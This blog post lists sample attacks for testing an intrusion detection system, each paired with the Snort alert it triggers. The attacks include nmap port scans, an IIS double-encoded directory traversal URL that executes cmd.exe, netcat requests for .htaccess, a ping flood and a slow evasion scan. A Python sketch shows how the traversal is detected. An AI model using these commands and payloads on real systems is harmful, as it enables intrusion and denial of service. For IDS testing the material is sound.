Monday, May 10, 2010

Testing IDS with Sample Attacks

Port Scanning

Attacks:
nmap -sS 131.107.1.254
nmap -sU 131.107.1.254
nmap -sT 131.107.1.254

Snort: SNMP AgentX/tcp request -or- SNMP request tcp
Category: Attempted Information Leak

IIS Unicode Directory Traversal Exploit Test

Attack:
http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
press Enter
press Enter

Snort: (http_inspect) DOUBLE DECODING ATTACK
Category: unclassified
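
Why Snort reports this request as double decoding rather than as a plain traversal: the path segment "..%255c.." only turns into "..\.." after two percent-decoding passes, so a check that decodes once never sees a ".." segment. The Python sketch below is an added example, not part of the original post and not Snort's own code; the function names and every sample URI except the first are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

SEP = re.compile(r"[\\/]")  # Windows accepts both / and \ as path separators


def decode_layers(path, limit=4):
    """Percent-decode repeatedly; return every intermediate form, raw first."""
    layers = [path]
    while len(layers) <= limit:
        nxt = unquote(layers[-1])
        if nxt == layers[-1]:   # nothing left to decode
            break
        layers.append(nxt)
    return layers


def has_dotdot(path):
    """True if any path segment is exactly '..' (a parent-directory step)."""
    return ".." in SEP.split(path)


def inspect_uri(uri):
    """Return (encoding_depth, index of first layer showing traversal or None)."""
    layers = decode_layers(urlsplit(uri).path)
    hit = next((i for i, p in enumerate(layers) if has_dotdot(p)), None)
    return len(layers) - 1, hit


if __name__ == "__main__":
    samples = [
        "http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir",  # from the post
        "/scripts/..%5c../winnt/",   # constructed: single-encoded
        "/a%2520b.txt",              # constructed: double-encoded, no traversal
        "/index.html",               # constructed: clean
    ]
    for uri in samples:
        depth, hit = inspect_uri(uri)
        print(f"depth={depth} traversal_layer={hit} {uri}")
```

An encoding depth of 2 or more is the double-decoding condition on its own; a traversal layer of 2 means the ".." segments were invisible until the second pass.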

Apache Directory Access Test

Attack:
http://131.107.1.254/.htaccess
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/.htaccess
press Enter
press Enter

Snort: WEB-MISC .htaccess access
Category: attempted-recon

Attack:
http://131.107.1.254/robots.txt
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/robots.txt
press Enter
press Enter

Snort: WEB-MISC robots.txt access
Category: web-application-activity

Ping Flood (Simple DoS Attack)

Attack:
ping -l 65000 131.107.1.254 (Windows)
or
ping -s 65000 131.107.1.254 (Linux)

Snort: ICMP L3retriever Ping
Category: attempted-recon

IDS Evasion Attack

Attack:
nmap -sS -PN -p80,443 -T1 131.107.1.254
